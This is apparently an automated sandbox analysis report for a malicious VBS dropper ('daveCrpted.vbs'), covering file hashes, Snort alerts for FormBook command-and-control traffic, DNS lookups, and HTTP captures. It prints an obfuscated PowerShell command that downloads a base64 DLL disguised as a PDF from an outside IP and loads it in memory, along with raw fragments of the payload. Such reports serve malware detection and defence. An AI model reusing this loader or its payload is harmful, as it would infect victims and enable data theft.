                        Preview:.**********************..Windows PowerShell transcript start..Start time: 20220527211524..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 783875 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG...ANgA0AFMAdAByAGkAbgBnACgAKABOAG...AdwAtAE8AYgBqAG...AYwB0ACAATgBlAHQALgBXAG...AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD...ALQAyADAAMgAyAC0A...wB0AGEAcgB0AF...AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG...AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlA

                        Static File Info

                        General

                        File type:Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
                        Entropy (8bit):1.1363099352339936
                        TrID:
                        • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                        • MP3 audio (1001/1) 32.22%
                        • Lumena CEL bitmap (63/63) 2.03%
                        • Corel Photo Paint (41/41) 1.32%
                        File name:daveCrpted.vbs
                        File size:848042
                        MD5:dc70eefa088f688d1cd4c4cf2c6674ca
                        SHA1:c358867a468d9722b3c40f0bcd0cbe2534756545
                        SHA256:1ec2c2c0a29c16146400c52880e887cfae57223b2b621c0f433ef9b619af5343
                        SHA512:e95c7f6622486ccb16cd1c15e68bca4101f2556c6a22a6b0318d03c9a9967097d0b98d37ce833e6669666318b7e73c2ca51513ac9a603a28d041a19b63de8b02
                        SSDEEP:192:6KqCQKQUBSRd6h7r1+5FL+HoFuM3BBxO1wjtg1v2U:6KqCQKQUBSRdK7r1+5FbBw1vJ
                        TLSH:D705F22332DAE0D871E5B6C74B87F5B907FEF6E4543D59A998CD09898BD1E0488063E3
                        File Content Preview:......:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.....:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:.:

                        File Icon

                        Icon Hash:e8d69ece869a9ec4

                        Network Behavior

                        Snort IDS Alerts

                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                        20.106.232.4192.168.2.580497382025011 05/27/22-21:15:31.357258TCP2025011ET TROJAN Powershell commands sent B64 2804973820.106.232.4192.168.2.5
                        20.106.232.4192.168.2.580497782025011 05/27/22-21:16:25.336336TCP2025011ET TROJAN Powershell commands sent B64 2804977820.106.232.4192.168.2.5
                        192.168.2.5118.27.122.21649870802031449 05/27/22-21:19:38.241995TCP2031449ET TROJAN FormBook CnC Checkin (GET)4987080192.168.2.5118.27.122.216
                        192.168.2.5118.27.122.21649870802031412 05/27/22-21:19:38.241995TCP2031412ET TROJAN FormBook CnC Checkin (GET)4987080192.168.2.5118.27.122.216
                        192.168.2.5118.27.122.21649870802031453 05/27/22-21:19:38.241995TCP2031453ET TROJAN FormBook CnC Checkin (GET)4987080192.168.2.5118.27.122.216

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        May 27, 2022 21:15:31.157217979 CEST4973880192.168.2.520.106.232.4
                        May 27, 2022 21:15:31.256846905 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:31.256988049 CEST4973880192.168.2.520.106.232.4
                        May 27, 2022 21:15:31.257313013 CEST4973880192.168.2.520.106.232.4
                        May 27, 2022 21:15:31.356786013 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:31.356861115 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:31.356926918 CEST4973880192.168.2.520.106.232.4
                        May 27, 2022 21:15:31.356936932 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:31.356992006 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:31.357058048 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:31.357068062 CEST4973880192.168.2.520.106.232.4
                        May 27, 2022 21:15:31.357122898 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:31.357193947 CEST4973880192.168.2.520.106.232.4
                        May 27, 2022 21:15:31.357193947 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:31.357258081 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:31.357353926 CEST4973880192.168.2.520.106.232.4
                        May 27, 2022 21:15:31.357355118 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:31.357408047 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:31.357522964 CEST4973880192.168.2.520.106.232.4
                        May 27, 2022 21:15:31.456520081 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:31.456577063 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:31.456655979 CEST4973880192.168.2.520.106.232.4
                        May 27, 2022 21:15:32.560467958 CEST4973880192.168.2.520.106.232.4
                        May 27, 2022 21:15:32.660125971 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:32.660202980 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:32.660228968 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:32.660253048 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:32.660279036 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:32.660321951 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:32.660329103 CEST4973880192.168.2.520.106.232.4
                        May 27, 2022 21:15:32.660346985 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:32.660372019 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:32.660376072 CEST4973880192.168.2.520.106.232.4
                        May 27, 2022 21:15:32.660382986 CEST4973880192.168.2.520.106.232.4
                        May 27, 2022 21:15:32.660397053 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:32.660420895 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:32.660438061 CEST4973880192.168.2.520.106.232.4
                        May 27, 2022 21:15:32.660445929 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:32.660471916 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:32.660495043 CEST4973880192.168.2.520.106.232.4
                        May 27, 2022 21:15:32.660511017 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:32.660536051 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:32.660542965 CEST4973880192.168.2.520.106.232.4
                        May 27, 2022 21:15:32.660562038 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:32.660587072 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:32.660588980 CEST4973880192.168.2.520.106.232.4
                        May 27, 2022 21:15:32.660612106 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:32.660636902 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:32.660636902 CEST4973880192.168.2.520.106.232.4
                        May 27, 2022 21:15:32.660661936 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:32.660686970 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:32.660711050 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:32.660711050 CEST4973880192.168.2.520.106.232.4
                        May 27, 2022 21:15:32.660758972 CEST4973880192.168.2.520.106.232.4
                        May 27, 2022 21:15:32.759658098 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:32.759710073 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:32.759749889 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:32.759776115 CEST4973880192.168.2.520.106.232.4
                        May 27, 2022 21:15:32.759792089 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:32.759834051 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:32.759844065 CEST4973880192.168.2.520.106.232.4
                        May 27, 2022 21:15:32.759875059 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:32.759893894 CEST4973880192.168.2.520.106.232.4
                        May 27, 2022 21:15:32.759916067 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:32.759957075 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:32.759999990 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:32.760008097 CEST4973880192.168.2.520.106.232.4
                        May 27, 2022 21:15:32.760041952 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:32.760050058 CEST4973880192.168.2.520.106.232.4
                        May 27, 2022 21:15:32.760082960 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:32.760126114 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:32.760165930 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:32.760185957 CEST4973880192.168.2.520.106.232.4
                        May 27, 2022 21:15:32.760205030 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:32.760232925 CEST4973880192.168.2.520.106.232.4
                        May 27, 2022 21:15:32.760245085 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:32.760286093 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:32.760325909 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:32.760334969 CEST4973880192.168.2.520.106.232.4
                        May 27, 2022 21:15:32.760365963 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:32.760370016 CEST4973880192.168.2.520.106.232.4
                        May 27, 2022 21:15:32.760404110 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:32.760443926 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:32.760493040 CEST4973880192.168.2.520.106.232.4
                        May 27, 2022 21:15:32.760519981 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:32.760565042 CEST4973880192.168.2.520.106.232.4
                        May 27, 2022 21:15:32.760566950 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:32.760607004 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:32.760646105 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:32.760685921 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:32.760718107 CEST4973880192.168.2.520.106.232.4
                        May 27, 2022 21:15:32.760726929 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:32.760731936 CEST4973880192.168.2.520.106.232.4
                        May 27, 2022 21:15:32.760768890 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:32.760807991 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:32.760848045 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:32.760875940 CEST4973880192.168.2.520.106.232.4
                        May 27, 2022 21:15:32.760890007 CEST804973820.106.232.4192.168.2.5
                        May 27, 2022 21:15:32.760926962 CEST4973880192.168.2.520.106.232.4
                        May 27, 2022 21:15:32.760935068 CEST804973820.106.232.4192.168.2.5

                        UDP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        May 27, 2022 21:19:32.559782028 CEST5415253192.168.2.58.8.8.8
                        May 27, 2022 21:19:32.585530996 CEST53541528.8.8.8192.168.2.5
                        May 27, 2022 21:19:37.686825991 CEST5531653192.168.2.58.8.8.8
                        May 27, 2022 21:19:37.946727991 CEST53553168.8.8.8192.168.2.5

                        DNS Queries

                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                        May 27, 2022 21:19:32.559782028 CEST192.168.2.58.8.8.80x255Standard query (0)www.nancykmorrison.storeA (IP address)IN (0x0001)
                        May 27, 2022 21:19:37.686825991 CEST192.168.2.58.8.8.80xcb86Standard query (0)www.hibikaiteki.comA (IP address)IN (0x0001)

                        DNS Answers

                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                        May 27, 2022 21:19:32.585530996 CEST8.8.8.8192.168.2.50x255No error (0)www.nancykmorrison.store172.67.160.125A (IP address)IN (0x0001)
                        May 27, 2022 21:19:32.585530996 CEST8.8.8.8192.168.2.50x255No error (0)www.nancykmorrison.store104.21.33.81A (IP address)IN (0x0001)
                        May 27, 2022 21:19:37.946727991 CEST8.8.8.8192.168.2.50xcb86No error (0)www.hibikaiteki.com118.27.122.216A (IP address)IN (0x0001)

                        HTTP Request Dependency Graph

                        • 20.106.232.4
                        • 2.56.57.22

                        HTTP Packets

                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        0192.168.2.54973820.106.232.480C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        TimestampkBytes transferredDirectionData
                        May 27, 2022 21:15:31.257313013 CEST126OUTGET /dll/26-05-2022-StartUp.pdf HTTP/1.1
                        Host: 20.106.232.4
                        Connection: Keep-Alive
                        May 27, 2022 21:15:31.356786013 CEST127INHTTP/1.1 200 OK
                        Date: Fri, 27 May 2022 19:15:31 GMT
                        Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.28
                        Last-Modified: Thu, 26 May 2022 14:26:51 GMT
                        ETag: "3aac-5dfeafb144fa1"
                        Accept-Ranges: bytes
                        Content-Length: 15020
                        Keep-Alive: timeout=5, max=100
                        Connection: Keep-Alive
                        Content-Type: application/pdf
                        Data Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 43 34 51 4e 70 41 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 56 41 41 41 43 51 41 41 41 41 47 41 41 41 41 41 41 41 41 72 6b 49 41 41 41 41 67 41 41 41 41 59 41 41 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41 41 42 41 41 41 41 41 41 41 41 41 41 47 41 41 41 41 41 41 41 41 41 41 43 67 41 41 41 41 41 67 41 41 41 41 41 41 41 41 4d 41 59 49 55 41 41 42 41 41 41 42 41 41 41 41 41 41 45 41 41 41 45 41 41 41 41 41 41 41 41 42 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 47 42 43 41 41 42 4c 41 41 41 41 41 47 41 41 41 4d 41 44 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 49 41 41 41 41 77 41 41 41 41 63 51 67 41 41 48 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 49 41 41 41 43 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 43 43 41 41 41 45 67 41 41 41 41 41 41 41 41 41 41 41 41 41 41 43 35 30 5a 58 68 30 41 41 41 41 74 43 49 41 41 41 41 67 41 41 41 41 4a 41 41 41 41 41 49 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 43 41 41 41 47 41 75 63 6e 4e 79 59 77 41 41 41 4d 41 44 41 41 41 41 59 41 41 41 41 41 51 41 41 41 41 6d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 41 41 41 42 41 4c 6e 4a 6c 62 47 39 6a 41 41 41 4d 41 41 41 41 41 49 41 41 41 41 41 43 41 41 41 41 4b 67 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 51 41 41 41 51 67 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 43 51 51 67 41 41 41 41 41 41 41 45 67 41 41 41 41 43 41 41 55 41 58 43 51 41 41 41 67 64 41 41 41 44 41 41 41 41 41 41 41 41 41 47 52 42 41 41 43 34 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 34 43 4b 41 45 41 41 41 6f 71 48 67 49 6f 41 67 41 41 43 69 71 6d 63 77 4d 41 41 41 71 41 41 51 41 41 42 48 4d 45 41 41 41 4b 67 41 49 41 41 41 52 7a 42 51 41 41 43 6f 41 44 41 41 41 45 63 77 59 41 41 41 71 41 42 41 41 41 42 43 6f 41 41 43 35 2b 41 51 41 41 42 47 38 48 41 41 41 4b 4b 69 35 2b 41 67 41 41 42 47 38 49 41 41 41 4b 4b 69 35 2b 41 77 41 41 42 47 38 4a 41 41 41 4b 4b 69 35 2b 42 41 41 41 42 47 38 4b 41 41 41 4b 4b 74 4a 2b 42 67 41 41 42 42 51 6f 46 67 41 41 43 6a 6b 65 41 41 41 41 63 67 45 41 41 48 44 51 42 77 41 41 41 69 67 4f 41 41 41 4b 62 78 63 41 41 41 70 7a 47 41 41 41 43 6f 41 47 41 41 41 45 66 67 59 41 41 41 51 71 41 41 41 41 47 6e 34 48 41 41 41 45 4b 67 41
                        Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAC4QNpAAAAAAAAAAAOAADiELAVAAACQAAAAGAAAAAAAArkIAAAAgAAAAYAAAAABAAAAgAAAAAgAABAAAAAAAAAAGAAAAAAAAAACgAAAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAGBCAABLAAAAAGAAAMADAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAwAAAAcQgAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAtCIAAAAgAAAAJAAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAMADAAAAYAAAAAQAAAAmAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAIAAAAACAAAAKgAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAACQQgAAAAAAAEgAAAACAAUAXCQAAAgdAAADAAAAAAAAAGRBAAC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4CKAEAAAoqHgIoAgAACiqmcwMAAAqAAQAABHMEAAAKgAIAAARzBQAACoADAAAEcwYAAAqABAAABCoAAC5+AQAABG8HAAAKKi5+AgAABG8IAAAKKi5+AwAABG8JAAAKKi5+BAAABG8KAAAKKtJ+BgAABBQoFgAACjkeAAAAcgEAAHDQBwAAAigOAAAKbxcAAApzGAAACoAGAAAEfgYAAAQqAAAAGn4HAAAEKgA
                        May 27, 2022 21:15:32.560467958 CEST142OUTGET /rumpe/26-05-2022-StartUp.pdf HTTP/1.1
                        Host: 20.106.232.4
                        May 27, 2022 21:15:32.660125971 CEST143INHTTP/1.1 200 OK
                        Date: Fri, 27 May 2022 19:15:32 GMT
                        Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.28
                        Last-Modified: Thu, 26 May 2022 14:25:11 GMT
                        ETag: "1a580-5dfeaf520524a"
                        Accept-Ranges: bytes
                        Content-Length: 107904
                        Content-Type: application/pdf
                        Data Raw: e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96 91 e2 99 ac e2 9c a6 e2 96
                        Data Ascii:


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        1192.168.2.5497392.56.57.2280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        TimestampkBytes transferredDirectionData
                        May 27, 2022 21:15:32.924431086 CEST254OUTGET /tsdfguhijk.txt HTTP/1.1
                        Host: 2.56.57.22
                        Connection: Keep-Alive
                        May 27, 2022 21:15:32.955058098 CEST256INHTTP/1.1 200 OK
                        Content-Type: text/plain
                        Last-Modified: Fri, 27 May 2022 16:54:25 GMT
                        Accept-Ranges: bytes
                        ETag: "8aa6206cea71d81:0"
                        Server: Microsoft-IIS/10.0
                        Date: Fri, 27 May 2022 19:15:32 GMT
                        Content-Length: 225280
                        Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 